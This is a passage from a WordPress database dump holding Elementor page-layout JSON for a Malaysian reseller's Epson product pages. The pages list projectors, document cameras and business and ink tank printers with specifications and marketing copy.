colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.<\\/p><ul><li>Yield of Up to 1,800 4R photos<\\/li><li>Lowest Printing Costs<\\/li><li>Wi-Fi &amp; Epson iPrint<\\/li><li>CD\\/DVD Printing Capability<\\/li><li>1 year or 3,000 prints warranty<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"65279bf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c65e6e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"57b8f7e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Projectors for Work\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bbe338f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4e4173d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1c6bf5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"CORPORATE AND EDUCATION\\u00a0\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7e9242e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"61d6693\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"bd3c8b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-2055<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2434\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2055.png\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"163\\\" \\/><\\/p><p>Leave the lights on and take control whether in the meeting room or classroom. Epson\\u2019s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.<\\/p><ul><li>XGA Resolution<\\/li><li>White and Colour Light Output at 5,000 lumens<\\/li><li>Gesture Presenter<\\/li><li>Multi-PC Projection<\\/li><li>2 x HDMI<\\/li><li>Split Screen<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9b5eee\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe4d6fd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-2142W<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2435\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2142W.jpg\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"138\\\" \\/><\\/p><p>Enjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.<\\/p><ul><li>White and Colour Brightness at 4,200lm<\\/li><li>WXGA Resolution<\\/li><li>12000 hours lamp life in eco-mode<\\/li><li>MHL-enabled<\\/li><li>Multi-PC Projection<\\/li><li>Horizontal Keystone Slider<\\/li><li>Miracast<sup>\\u00ae<\\/sup><\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<span style=\\\"font-size: 10.5px;\\\"><br \\/><\\/span><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"24b65ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a26a32f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-L500W\\u00a0<\\/strong><img class=\\\"wp-image-2436 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-L500W.jpg\\\" alt=\\\"\\\" width=\\\"251\\\" height=\\\"142\\\" \\/><\\/p><p>The compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour\\/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.<\\/p><ul><li>5,000 lumens colour\\/white brightness<sup>\\u00a0<\\/sup><\\/li><li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio<\\/li><li>Laser light source of up to 20,000 hours<\\/li><li>Virtually maintenance-free for optical engine life<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cd625e2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8750887\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c4ec64b\",\"elType\":\"widget\",\"settings\":{\"title\":\"ACCENT LIGHTING LASER PROJECTORS\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5f02a57\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"993393a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e46d09c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson LightScene EV-105<\\/strong><\\/p><p><img class=\\\"wp-image-2437 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-LightScene-EV-105.jpg\\\" alt=\\\"\\\" width=\\\"263\\\" height=\\\"176\\\" \\/><\\/p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and d\\u00e9cor applications. Designed to blend in discreetly to any setting \\u2014 from retail, hospitality and event spaces to showrooms and museums \\u2014 LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.<\\/p><ul><li>Laser projector for digital art and signage<\\/li><li>Seamlessly blends into virtually any environment<\\/li><li>Up to 20,000 hours of virtually maintenance-free operation<\\/li><li>360-degree mounting: floors, walls or ceilings<\\/li><li>Remote management and control tools<\\/li><li>Best New Award Overall<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b9132fb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"5a3decf\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ccb5acc\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"45f89fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7ec2bf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>ULTRA PORTABLE<\\/h3><p><strong>Epson EB-1785W\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2438\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-1785W.png\\\" alt=\\\"\\\" width=\\\"236\\\" height=\\\"133\\\" \\/><\\/p><p>The Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.<\\/p><ul><li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens<\\/li><li>WXGA Resolution<\\/li><li>Real-Time Auto Keystone Correction<\\/li><li>Split Screen Projection<\\/li><li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1914d98\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b5f42fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"e3f8c24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d81ddc4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"890a1d6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INTERACTIVE\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c314a77\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"fbcb210\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1897c27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-536Wi\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2439\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-536Wi.png\\\" alt=\\\"\\\" width=\\\"242\\\" height=\\\"136\\\" \\/><\\/p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.<\\/p><ul><li>White and Colour Brightness at 3,400lm<\\/li><li>WXGA Resolution<\\/li><li>Multi-PC projection<\\/li><li>HDMI Connectivity<\\/li><li>Pen Interactivity<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a597712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d315157\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson 595Wi\\/585Wi\\/575Wi<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2440\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-595Wi.png\\\" alt=\\\"\\\" width=\\\"276\\\" height=\\\"155\\\" \\/><\\/p><p>With the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.<\\/p><ul><li>WXGA Resolution<\\/li><li>White and Colour Brightness at 3,300lm<\\/li><li>Multi-PC projection<\\/li><li>HDMI Connectivity x2<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"de8ca10\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"61ea7aa\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e5676d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"281e34f\",\"elType\":\"widget\",\"settings\":{\"title\":\"HIGH BRIGHTNESS\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a49451\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f301a8e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7e2436\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-L1405UNL\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2441\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/EB-L1405UNL.png\\\" alt=\\\"\\\" width=\\\"207\\\" height=\\\"117\\\" \\/><\\/p><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000\\u00a0long lasting hours maintenance-free.<\\/p><ul><li>White and Colour Brightness at 8,000lm<\\/li><li>WUXGA (1920 x 1200)<\\/li><li>Edge-blending to create large panoramic images<\\/li><li>Curve and corner wall projection<\\/li><li>HDBaseT<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"dd3bc89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6d9f7b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-G7400UNL\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2442\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-G7400UNL.png\\\" alt=\\\"\\\" width=\\\"205\\\" height=\\\"116\\\" \\/><\\/p><p>Epson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fine\\u2122 and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projector\\u2019s astoundingly short throw ratio of 0.35*.<\\/p><p><em>* With optional ELPLX01 zero offset ultra-short throw lens.<\\/em><\\/p><ul><li>High Brightness<\\/li><li>Beyond Full HD Resolution<\\/li><li>Powered Lens<\\/li><li>Portrait Projection<\\/li><li>Flexible Installation<\\/li><li>Edge Blending<\\/li><li>Point Correction<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2860f60\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abe0604\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-Z10000U\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2443\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-Z10000U.png\\\" alt=\\\"\\\" width=\\\"208\\\" height=\\\"117\\\" \\/><\\/p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.<\\/p><ul><li>White and Colour Brightness at 10,000\\u00a0lm<\\/li><li>WUXGA resolution<\\/li><li>High Reliability and Durability<\\/li><li>Suitable for 24\\/7 usage<\\/li><li>Flexible projection angles and installations<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6e2f23c\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"1be2016\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ccccf17\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>DOCUMENT CAMERAS<\\/h3><p><strong>Document Camera ELPDC21\\u00a0<\\/strong><img src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Document-Camera-ELPDC21.jpg\\\" alt=\\\"\\\" width=\\\"206\\\" height=\\\"137\\\" \\/><\\/p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.<\\/p><ul><li>Pixels: 2MP (1920 x 1080 pixels)<\\/li><li>Camera Sensor: 1\\/2.7 inch CMOS Sensor<\\/li><li>Resolution: Up to Full HD (1080p)<\\/li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom<\\/li><li>Weight: Approx 3.0kg<\\/li><\\/ul><p>[maxbutton id=\\\"12\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d5e60a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b6a1050\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(7804,3458,'_elementor_version','2.5.14'),(7807,3459,'_wp_page_template','template-fullwidth.php'),(7808,3459,'_elementor_edit_mode','builder'),(7809,3459,'_elementor_template_type','post'),(7810,3459,'_elementor_data','[{\"id\":\"0bcf275\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"829ac8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2449815\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.<\\/p><h2>Printers for Work<\\/h2><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2698f52\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"93fa1d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f872ca9\",\"elType\":\"widget\",\"settings\":{\"title\":\"BUSINESS INKJET PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2a74bb0\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"245ffff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"12a92f5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce Enterprise WF-C17590\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2417\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Enterprise-WF-C17590.jpg\\\" alt=\\\"\\\" width=\\\"366\\\" height=\\\"207\\\" \\/><\\/p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCore\\u2122, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.<\\/p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax<\\/li><li>Ink: DURABrite<sup>TM<\\/sup>\\u00a0Pro pigment ink cartridges<\\/li><li>ISO Print Speed: 75 ISO ppm (black\\/colour) simplex\\/duplex<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"d99a531\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"51d6ae3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3a12efc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ffeb9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce Pro WF-C5290\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2418\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Pro-WF-C5290.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.<\\/p><ul><li>High yield ink packs<\\/li><li>High-speed auto-duplex printing<\\/li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li><li>Epson Connect<\\/li><li>Energy\\u00a0saving<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c9f78e3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"94b61d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b740aaa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce WF-100\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2419\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-100.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.<\\/p><ul><li>Print speed up to 14 ppm<\\/li><li>Epson Connect<\\/li><li>1.44 Colour LCD Panel<\\/li><li>Wi-Fi and Wi-Fi Direct connectivity<\\/li><li>Built-in battery<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"96730a6\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":49,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"addc0f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2b0e3f9\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"e754d94\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fc3866b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce WF-7711<\\/strong><\\/h4>\\n<img class=\\\"wp-image-2420 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-7711.png\\\" alt=\\\"\\\" width=\\\"304\\\" height=\\\"172\\\" \\/><br>\\n\\nChange the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM<\\/sup>\\u00a0technology, fast printing speed consistently delivers success in every detail.\\n<ul>\\n \\t<li>Print speeds up to 18ipm for black and 10ipm for colour<\\/li>\\n \\t<li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li>\\n \\t<li>Duplex printing up to A3 size<\\/li>\\n \\t<li>Epson DURABrite<sup>TM<\\/sup>\\u00a0Ultra ink<\\/li>\\n \\t<li>4.3\\u201d Colour LCD Touch Panel<\\/li>\\n \\t<li>Print, Scan, Copy Fax with ADF<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5178d20\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b031280\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"b3a013d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f2b7b04\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c71ec36\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"732a1a6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INK TANK SYSTEM\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e709cb3\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"60cd262\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97d2102\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EcoTank L3150<\\/strong><\\/h4><p><img class=\\\"wp-image-2421 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EcoTank-L3150-.jpg\\\" alt=\\\"\\\" width=\\\"311\\\" height=\\\"175\\\" \\/><\\/p><p>Save more with Epson\\u2019s economical and multifunctional printing solutions for business\\u2014the EcoTank L3150\\u2014built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High yield ink bottles<\\/li><li>Spill-free, error-free refilling<\\/li><li>Wi-Fi, Wi-Fi Direct<\\/li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)<\\/li><li>Borderless printing up to 4R<\\/li><\\/ul><div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"63366b2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8449cce\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson L120 Printer\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2422\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L120-Printer.png\\\" alt=\\\"\\\" width=\\\"301\\\" height=\\\"170\\\" \\/><\\/h4><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.<\\/p><ul><li>High-yield ink bottles<\\/li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color<\\/li><li>Compact Size<\\/li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9109035\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":164,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"140f583\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7d56d33\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a539e2b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson M1100 Printer<\\/strong><\\/h4><p><img class=\\\"wp-image-2423 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-M1100-Printer-.png\\\" alt=\\\"\\\" width=\\\"315\\\" height=\\\"178\\\" \\/><\\/p><p>Efficiency\\u00a0meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pages\\u00a0each. Simplify processes with the integrated ink tank that enables spill - and error-free ink 